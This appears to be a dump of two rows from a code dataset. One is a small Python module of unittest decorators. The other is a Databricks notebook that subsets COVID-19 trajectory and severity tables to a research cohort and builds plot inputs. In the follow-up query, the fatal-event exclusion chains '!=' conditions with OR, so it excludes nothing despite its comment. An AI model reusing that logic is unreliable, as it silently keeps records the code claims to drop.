text
stringlengths 2
999k
|
|---|
from typing import TypeVar, Callable
import unittest
from ._types import TestMethod
_F = TypeVar("_F", bound=TestMethod)
def test(method: _F) -> _F:
"""Decorator that flags a method as a test method."""
method._dectest_test = True # type: ignore
return method
def before(method: _F) -> _F:
"""Decorator that flags a method as fixture setup.
Fixture setup methods from base classes are guaranteed to be executed
before setup methods from derived classes.
"""
method._dectest_before = True # type: ignore
return method
def after(method: _F) -> _F:
"""Decorator that flags a method as fixture teardown.
Fixture teardown methods from base classes are guaranteed to be executed
after teardown methods from derived classes.
"""
method._dectest_after = True # type: ignore
return method
def skip(reason: str) -> Callable[[_F], _F]:
"""Unconditionally skip the decorated test.
This is equivalent to @unittest.skip, but also marks the decorated
function as a test.
"""
if not isinstance(reason, str):
raise TypeError("first argument to @skip must be a reason string")
def decorate(method: _F) -> _F:
return unittest.skip(reason)(test(method))
return decorate
def skip_if(condition: bool, reason: str) -> Callable[[_F], _F]:
"""Skip the decorated test if condition is true.
This is equivalent to @unittest.skipIf, but also marks the decorated
function as a test.
"""
def decorate(method: _F) -> _F:
return unittest.skipIf(condition, reason)(test(method))
return decorate
def skip_unless(condition: bool, reason: str) -> Callable[[_F], _F]:
"""Skip the decorated test unless condition is true.
This is equivalent to @unittest.skipUnless, but also marks the decorated
function as a test.
"""
def decorate(method: _F) -> _F:
return unittest.skipUnless(condition, reason)(test(method))
return decorate
|
# Databricks notebook source
# MAGIC %md
# MAGIC # CCU013_08 Paper subset data to cohort
# MAGIC
# MAGIC **Description**
# MAGIC
# MAGIC This notebook subsets the covid trajectory, severity and events tables to the cohort used for the phenotype severity paper.
# MAGIC
# MAGIC **Project(s)** CCU0013
# MAGIC
# MAGIC **Author(s)** Johan Thygesen, Chris Tomlinson
# MAGIC
# MAGIC **Reviewer(s)**
# MAGIC
# MAGIC **Date last updated** 2022-01-22
# MAGIC
# MAGIC **Date last reviewed**
# MAGIC
# MAGIC **Date last run** 2022-01-22
# MAGIC
# MAGIC **Data input**
# MAGIC 1. Descriptive Paper methodology derived cohort
# MAGIC 2. Maximally inclusive COVID-19 related event phenotypes:
# MAGIC 1. `ccu013_covid_trajectory`
# MAGIC 2. `ccu013_covid_events_demographics`
# MAGIC
# MAGIC **Data output**
# MAGIC 1. `ccu013_covid_trajectory_paper_cohort` - Comprehensive long list of COVID-19 related events, subset to paper cohort
# MAGIC 2. `ccu013_covid_severity_paper_cohort` - Mutually exclusive 'worst' COVID-19 related event, 1 row per patient
# MAGIC 3. `ccu013_covid_events_demographics_paper_cohort`- Binary matrix of COVID-19 related events + demographics, 1 row per patient
# MAGIC
# MAGIC **Software and versions** SQL, python
# MAGIC
# MAGIC **Packages and versions** See cell below:
# MAGIC
# MAGIC **TODO**
# MAGIC * Implement Longcovid search
# COMMAND ----------
# MAGIC %md
# MAGIC # 1 Subset Covid Phenotype data to the cohort population of interest
# COMMAND ----------
from pyspark.sql.functions import lit, col, udf
from functools import reduce
from pyspark.sql import DataFrame
from datetime import datetime
from pyspark.sql.types import DateType
# COMMAND ----------
# MAGIC %run /Workspaces/dars_nic_391419_j3w9t_collab/CCU013/COVID-19-SEVERITY-PHENOTYPING/CCU013_00_helper_functions
# COMMAND ----------
# MAGIC %md
# MAGIC ### 1.1 New approach (current) using the DP definition
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Individuals alive and registred in GDPPR on 23/01/2020
# MAGIC --- Old value = 55,876,173
# MAGIC --- Old @ 170821 = 56,609,049
# MAGIC --- Current value @ 220122 = 57,032,174
# MAGIC SELECT count(DISTINCT NHS_NUMBER_DEID) FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020
# COMMAND ----------
# MAGIC %md
# MAGIC #### 1.1.1 Find patients who do not have minimum follow up time
# MAGIC - Participants with non-fatal index events who had less than 28 days of follow up were excluded.
# COMMAND ----------
# MAGIC %sql
# MAGIC --- IMPORTANT check that no death date is larger than the study end date !!!
# MAGIC ---- As that would cause errors in the code below
# MAGIC SELECT MAX(date)
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# MAGIC WHERE covid_phenotype == '04_Fatal_with_covid_diagnosis' OR
# MAGIC covid_phenotype == '04_Fatal_without_covid_diagnosis' OR
# MAGIC covid_phenotype == '04_Covid_inpatient_death'
# COMMAND ----------
from pyspark.sql.functions import *
# Warning - update study end date
study_end_date = lit(datetime(2021, 11, 30))
all_fatal = spark.sql("""
SELECT person_id_deid, MIN(date) AS death_date
FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
WHERE (covid_phenotype == '04_Fatal_with_covid_diagnosis' OR
covid_phenotype == '04_Fatal_without_covid_diagnosis' OR
covid_phenotype == '04_Covid_inpatient_death')
AND date >= "2020-01-23"
GROUP BY person_id_deid
""")
# Get first covid event dates for everyone, expect those with ONLY fatal events
followup_time = spark.sql("""
SELECT person_id_deid, MIN(date) AS first_covid_event
FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
WHERE (covid_phenotype != '04_Fatal_with_covid_diagnosis' OR
covid_phenotype != '04_Fatal_without_covid_diagnosis' OR
covid_phenotype != '04_Covid_inpatient_death')
AND date >= "2020-01-23"
GROUP BY person_id_deid
""")
# Calculate elapsed number of days between earliest event and study end (except if fatal)
followup_time = followup_time.join(all_fatal, ['person_id_deid'], how='left')
followup_time = followup_time.select(['person_id_deid', 'first_covid_event', 'death_date'])
followup_time = followup_time.withColumn('study_end', study_end_date)
followup_time= followup_time.withColumn('followup_days',
when(followup_time['death_date'].isNull(), datediff(followup_time['study_end'], followup_time['first_covid_event'])).otherwise(-1))
# Mark deaths within 28 days
followup_time = followup_time.withColumn('28d_followup', \
when((followup_time['followup_days'] >= 28) | (followup_time['followup_days'] == -1), 1).otherwise(0))
#display(followup_time)
followup_time.createOrReplaceGlobalTempView('followup_time')
# COMMAND ----------
# MAGIC %md
# MAGIC Note that these counts are prior to joining on to skinny table, in other words could contain patients that don't meet the study inclusion
# COMMAND ----------
# MAGIC %sql
# MAGIC -- participants excluded due to lack of 28 days minimal followup time.
# MAGIC -- OLD With study_end as 2021, 3, 31 -> 1,280,138
# MAGIC -- OLD WIth study_end as 2021, 5, 31 -> 1,081,496
# MAGIC -- current with study_end as 2021, 11, 30 -> 917,278
# MAGIC SELECT count(DISTINCT person_id_deid) FROM global_temp.followup_time
# MAGIC WHERE 28d_followup == 0
# COMMAND ----------
# MAGIC %sql
# MAGIC --- CHECK that no follwup time is less than -1
# MAGIC SELECT * FROM global_temp.followup_time
# MAGIC where followup_days < -1
# COMMAND ----------
# MAGIC %md
# MAGIC #### 1.1.2 Subset trajectory table
# MAGIC Subset for cohort population - inclusion time and minimum follow-up
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Current @ 22.01.22 = 8,714,594
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Current @ 22.01.22 = 8,714,455
# MAGIC -- Removes only: 139 patients
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# MAGIC WHERE date >= "2020-01-23" AND date <= "2021-11-30"
# COMMAND ----------
# MAGIC %sql
# MAGIC -- These are those records dated before index event
# MAGIC -- NB 597 unique IDs here, but these patients could also have event within study dates
# MAGIC SELECT * from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# MAGIC WHERE date < "2020-01-23" OR date > "2021-11-30"
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Subset trajectory table to cohort population and cohort timeline
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_paper_cohort_tmp AS
# MAGIC SELECT tab1.* FROM
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory tab1
# MAGIC INNER JOIN
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 tab2
# MAGIC ON
# MAGIC tab1.person_id_deid = tab2.NHS_NUMBER_DEID
# MAGIC WHERE date >= "2020-01-23" AND date <= "2021-11-30"
# COMMAND ----------
# MAGIC %sql
# MAGIC -- Value @ 150621 3567617
# MAGIC -- Value @ 170821 3705123
# MAGIC -- Value @ 220222 8103909
# MAGIC SELECT count (DISTINCT person_id_deid) from global_temp.ccu013_covid_trajectory_paper_cohort_tmp
# COMMAND ----------
# MAGIC %sql
# MAGIC -- Remove those based on minimum follow-up criteria
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_paper_cohort as
# MAGIC WITH list_patients_to_omit AS (SELECT person_id_deid from global_temp.followup_time WHERE 28d_followup == 0)
# MAGIC SELECT /*+ BROADCAST(list_patients_to_omit) */ t.* FROM global_temp.ccu013_covid_trajectory_paper_cohort_tmp as t
# MAGIC LEFT ANTI JOIN list_patients_to_omit ON t.person_id_deid = list_patients_to_omit.person_id_deid
# COMMAND ----------
drop_table("ccu013_covid_trajectory_paper_cohort")
create_table("ccu013_covid_trajectory_paper_cohort")
# COMMAND ----------
# MAGIC %sql
# MAGIC OPTIMIZE dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort ZORDER BY person_id_deid
# COMMAND ----------
# MAGIC %sql
# MAGIC -- value @ 150621 = 3454653
# MAGIC -- value @ 170821 = 3469528
# MAGIC -- value @ 220122 = 7244925
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC -- value @ 150621 = 8683174
# MAGIC -- value @ 170821 = 8825738
# MAGIC -- value @ 220122 = 13990423
# MAGIC SELECT count (*) as total_records from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT covid_phenotype, count (DISTINCT person_id_deid) as unique_ids, count (person_id_deid) as observations
# MAGIC from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort
# MAGIC group by covid_phenotype
# MAGIC order by covid_phenotype
# COMMAND ----------
# MAGIC %md
# MAGIC #### 1.1.3 Recreate severity table using cohort only info
# COMMAND ----------
# MAGIC %sql
# MAGIC -- OLD value 5,044,357
# MAGIC -- Current value 8,714,594
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_severity
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_severity_paper_cohort AS
# MAGIC SELECT DISTINCT s.person_id_deid, s.date, s.covid_severity, s.ProductionDate FROM dars_nic_391419_j3w9t_collab.ccu013_covid_severity as s
# MAGIC INNER JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort as t
# MAGIC ON s.person_id_deid == t.person_id_deid
# COMMAND ----------
drop_table("ccu013_covid_severity_paper_cohort")
create_table("ccu013_covid_severity_paper_cohort")
# COMMAND ----------
# MAGIC %sql
# MAGIC REFRESH dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC -- value @ 150621 = 3454653
# MAGIC -- value @ 170821 = 3469528
# MAGIC -- Current @ 220122 = 7244925
# MAGIC SELECT count(DISTINCT person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT count(*) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort
# COMMAND ----------
# MAGIC %md
# MAGIC # 2 Create input for patient trajectory plots
# MAGIC - Create order and simplified phenotype groups for the plots
# MAGIC - Get the first event date from the new simplified trajectory phenotypes and order by id, date and phenotype order.
# MAGIC - Calculate days between events and write to table for further processing in R
# MAGIC - see ccu013 R script ccu013_trajectory_finder.R for next steps
# COMMAND ----------
# MAGIC %md
# MAGIC ## 2.1 Full study period
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Query to get all events includeing the uneffected event at the start of the pandemic for all individuals in study.
# MAGIC ---SELECT covid_severity, count(covid_severity) FROM (
# MAGIC SELECT person_id_deid, date, covid_phenotype, (CASE WHEN covid_severity IS NULL THEN '00_unaffected' ELSE covid_severity END) AS covid_severity, phenotype_order, trajectory_phenotype FROM (
# MAGIC SELECT NHS_NUMBER_DEID AS person_id_deid, DATE('2020-01-23') AS date, '00_Unaffected' AS covid_phenotype, covid_severity, 0 AS phenotype_order, 'Unaffected' AS trajectory_phenotype FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 AS a
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort AS b ON a.NHS_NUMBER_DEID = b.person_id_deid)
# MAGIC ---)group by covid_severity
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Create an ordered and simplified phenotype groups table
# MAGIC --- This includes all events includeing the uneffected event at the start of the pandemic for all individuals in study.
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_plot_data_tmp AS
# MAGIC SELECT * FROM
# MAGIC (SELECT DISTINCT tab1.person_id_deid, tab1.date, tab1.covid_phenotype, tab2.covid_severity,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then 1
# MAGIC when "01_GP_covid_diagnosis" then 2
# MAGIC when "02_Covid_admission" then 3
# MAGIC when "03_NIV_treatment" then 4
# MAGIC when "03_ICU_admission" then 4
# MAGIC when "03_IMV_treatment" then 4
# MAGIC when "03_ECMO_treatment" then 4
# MAGIC when "04_Fatal_with_covid_diagnosis" then 5
# MAGIC when "04_Fatal_without_covid_diagnosis" then 5
# MAGIC when "04_Covid_inpatient_death" then 5 ELSE NULL end) as phenotype_order,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then "Positive test"
# MAGIC when "01_GP_covid_diagnosis" then "Primary care diagnosis"
# MAGIC when "02_Covid_admission" then "Hospitalisation"
# MAGIC when "03_NIV_treatment" then "Critical care"
# MAGIC when "03_ICU_admission" then "Critical care"
# MAGIC when "03_IMV_treatment" then "Critical care"
# MAGIC when "03_ECMO_treatment" then "Critical care"
# MAGIC when "04_Fatal_with_covid_diagnosis" then "Death"
# MAGIC when "04_Fatal_without_covid_diagnosis" then "Death"
# MAGIC when "04_Covid_inpatient_death" then "Death" ELSE NULL end) as trajectory_phenotype
# MAGIC FROM
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort as tab1
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity as tab2 ON tab1.person_id_deid = tab2.person_id_deid
# MAGIC UNION ALL
# MAGIC SELECT person_id_deid, date, covid_phenotype, (CASE WHEN covid_severity IS NULL THEN '00_unaffected' ELSE covid_severity END) AS covid_severity, phenotype_order, trajectory_phenotype FROM (
# MAGIC SELECT NHS_NUMBER_DEID AS person_id_deid, DATE('2020-01-23') AS date, '00_Unaffected' AS covid_phenotype, covid_severity, 0 AS phenotype_order, 'Unaffected' AS trajectory_phenotype FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 AS a
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort AS b ON a.NHS_NUMBER_DEID = b.person_id_deid))
# MAGIC ORDER BY person_id_deid, date, phenotype_order
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Exemplar of ordered data
# MAGIC SELECT * from global_temp.ccu013_covid_trajectory_plot_data_tmp
# MAGIC WHERE person_id_deid = '00046L6S0IX8YE1'
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Example of query used below to caclualte time between events per ID
# MAGIC --- Get the event dates from the new trajectory phenotypes and order by id, date and phenotype order.
# MAGIC SELECT DISTINCT person_id_deid, min(date) as date, covid_severity, trajectory_phenotype, phenotype_order from global_temp.ccu013_covid_trajectory_plot_data_tmp
# MAGIC GROUP BY person_id_deid, phenotype_order, trajectory_phenotype, covid_severity
# MAGIC ORDER BY person_id_deid, date, phenotype_order
# COMMAND ----------
## 3) Calculate days between events and write to table for further processing in R
### see ccu013 R script ccu013_trajectory_finder.R for next steps
from pyspark.sql.functions import *
import pyspark.sql.functions as f
from pyspark.sql.window import Window
traject_data = spark.sql("""
SELECT DISTINCT person_id_deid, min(date) as date, covid_severity, trajectory_phenotype, phenotype_order from global_temp.ccu013_covid_trajectory_plot_data_tmp
GROUP BY person_id_deid, phenotype_order, trajectory_phenotype, covid_severity
ORDER BY person_id_deid, date, phenotype_order
""")
window = Window.partitionBy('person_id_deid').orderBy(['date', 'phenotype_order'])
# Calculate difference in days per ID
traject_data = traject_data.withColumn("days_passed", f.datediff(traject_data.date,
f.lag(traject_data.date, 1).over(window)))
#display(traject_data)
traject_data.createOrReplaceGlobalTempView("ccu013_covid_trajectory_graph_data")
drop_table("ccu013_covid_trajectory_graph_data")
create_table("ccu013_covid_trajectory_graph_data")
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Examplar output for one individual
# MAGIC SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data
# MAGIC WHERE person_id_deid = '00046L6S0IX8YE1'
# COMMAND ----------
# MAGIC %sql
# MAGIC REFRESH dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data
# COMMAND ----------
# MAGIC %sql
# MAGIC -- 56609049
# MAGIC -- 57032174
# MAGIC SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data
# COMMAND ----------
# MAGIC %md
# MAGIC ## 2.2 wave 1 - trajectory input
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Query to define all pople included in wave 1
# MAGIC --- This is used below to subset the trajectory graph data
# MAGIC --- SELECT * FROM
# MAGIC SELECT count(distinct a.person_id_deid) FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as a
# MAGIC --- Remove anyone with a
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-03-20") as t
# MAGIC ON a.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON a.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-03-20" OR death_date is null
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave1 AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC --- Remove anyone who had covid before the wave
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-03-20") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC --- Remove anyone who died before the wave
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-03-20" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2020-05-29"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave1")
create_table("ccu013_covid_trajectory_graph_data_wave1")
# COMMAND ----------
# MAGIC %sql
# MAGIC -- old value - 56491308
# MAGIC -- current value = 56945027
# MAGIC SELECT count(distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old = 57035046
# MAGIC --- current value = 57490005
# MAGIC SELECT count(*) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old = 263,839
# MAGIC --- OBS Not sure this is in use any more
# MAGIC ---SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort_wave1
# COMMAND ----------
# MAGIC %sql
# MAGIC --- 3456753
# MAGIC --- 7232055
# MAGIC SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC ---SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC WHERE covid_severity != "00_unaffected" ---AND date <= date_add(TO_DATE("2020-05-29"),28)
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old value = 53034555
# MAGIC --- Current value @ = 49712972
# MAGIC SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC ---SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC WHERE covid_severity == "00_unaffected" ---AND date <= date_add(TO_DATE("2020-05-29"),28)
# COMMAND ----------
# MAGIC %md
# MAGIC ## 2.3 wave 2 - trajectory input
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old value = 55774208
# MAGIC --- New value @ 220122 = 56225024
# MAGIC --- Query to define all pople included in wave 2
# MAGIC --- This is used below to subset the trajectory graph data
# MAGIC SELECT count(distinct a.person_id_deid) FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as a
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-09-30") as t
# MAGIC ON a.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON a.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-09-30" OR death_date is null
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave2 AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-09-30") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-09-30" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2021-02-12"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave2")
create_table("ccu013_covid_trajectory_graph_data_wave2")
# COMMAND ----------
# MAGIC %md
# MAGIC # 3. Trajectory plot input - ICU only as Critical care.
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Create an ordered and simplified phenotype groups table
# MAGIC --- This includes all events includeing the uneffected event at the start of the pandemic for all individuals in study.
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_plot_data_icu_tmp AS
# MAGIC SELECT * FROM
# MAGIC (SELECT DISTINCT tab1.person_id_deid, tab1.date, tab1.covid_phenotype, tab2.covid_severity,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then 1
# MAGIC when "01_GP_covid_diagnosis" then 2
# MAGIC when "02_Covid_admission" then 3
# MAGIC when "03_NIV_treatment" then NULL
# MAGIC when "03_ICU_admission" then 4
# MAGIC when "03_IMV_treatment" then NULL
# MAGIC when "03_ECMO_treatment" then NULL
# MAGIC when "04_Fatal_with_covid_diagnosis" then 5
# MAGIC when "04_Fatal_without_covid_diagnosis" then 5
# MAGIC when "04_Covid_inpatient_death" then 5 ELSE NULL end) as phenotype_order,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then "Positive test"
# MAGIC when "01_GP_covid_diagnosis" then "Primary care diagnosis"
# MAGIC when "02_Covid_admission" then "Hospitalisation"
# MAGIC when "03_NIV_treatment" then NULL
# MAGIC when "03_ICU_admission" then "ICU admission"
# MAGIC when "03_IMV_treatment" then NULL
# MAGIC when "03_ECMO_treatment" then NULL
# MAGIC when "04_Fatal_with_covid_diagnosis" then "Death"
# MAGIC when "04_Fatal_without_covid_diagnosis" then "Death"
# MAGIC when "04_Covid_inpatient_death" then "Death" ELSE NULL end) as trajectory_phenotype
# MAGIC FROM
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort as tab1
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity as tab2 ON tab1.person_id_deid = tab2.person_id_deid
# MAGIC UNION ALL
# MAGIC SELECT person_id_deid, date, covid_phenotype, (CASE WHEN covid_severity IS NULL THEN '00_unaffected' ELSE covid_severity END) AS covid_severity, phenotype_order, trajectory_phenotype FROM (
# MAGIC SELECT NHS_NUMBER_DEID AS person_id_deid, DATE('2020-01-23') AS date, '00_Unaffected' AS covid_phenotype, covid_severity, 0 AS phenotype_order, 'Unaffected' AS trajectory_phenotype FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 AS a
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort AS b ON a.NHS_NUMBER_DEID = b.person_id_deid))
# MAGIC WHERE phenotype_order is not NULL
# MAGIC ORDER BY person_id_deid, date, phenotype_order
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Exemplar of ordered data
# MAGIC SELECT * from global_temp.ccu013_covid_trajectory_plot_data_icu_tmp
# MAGIC WHERE person_id_deid = '00046L6S0IX8YE1'
# COMMAND ----------
## 3) Calculate days between events and write to table for further processing in R
### see ccu013 R script ccu013_trajectory_finder.R for next steps
from pyspark.sql.functions import *
import pyspark.sql.functions as f
from pyspark.sql.window import Window
traject_data = spark.sql("""
SELECT DISTINCT person_id_deid, min(date) as date, covid_severity, trajectory_phenotype, phenotype_order from global_temp.ccu013_covid_trajectory_plot_data_icu_tmp
GROUP BY person_id_deid, phenotype_order, trajectory_phenotype, covid_severity
ORDER BY person_id_deid, date, phenotype_order
""")
window = Window.partitionBy('person_id_deid').orderBy(['date', 'phenotype_order'])
# Calculate difference in days per ID
traject_data = traject_data.withColumn("days_passed", f.datediff(traject_data.date,
f.lag(traject_data.date, 1).over(window)))
#display(traject_data)
traject_data.createOrReplaceGlobalTempView("ccu013_covid_trajectory_graph_data_icu")
drop_table("ccu013_covid_trajectory_graph_data_icu")
create_table("ccu013_covid_trajectory_graph_data_icu")
# COMMAND ----------
# MAGIC %md
# MAGIC ### 3.1 Wave 1
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave1_icu AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_icu as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC --- Remove anyone who had covid before the wave
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-03-20") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC --- Remove anyone who died before the wave
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-03-20" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2020-05-29"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave1_icu")
create_table("ccu013_covid_trajectory_graph_data_wave1_icu")
# COMMAND ----------
# MAGIC %sql
# MAGIC -- OLD - = 56491308
# MAGIC -- New @ 220122 = 56945027
# MAGIC SELECT count(distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1_icu
# COMMAND ----------
# MAGIC %md
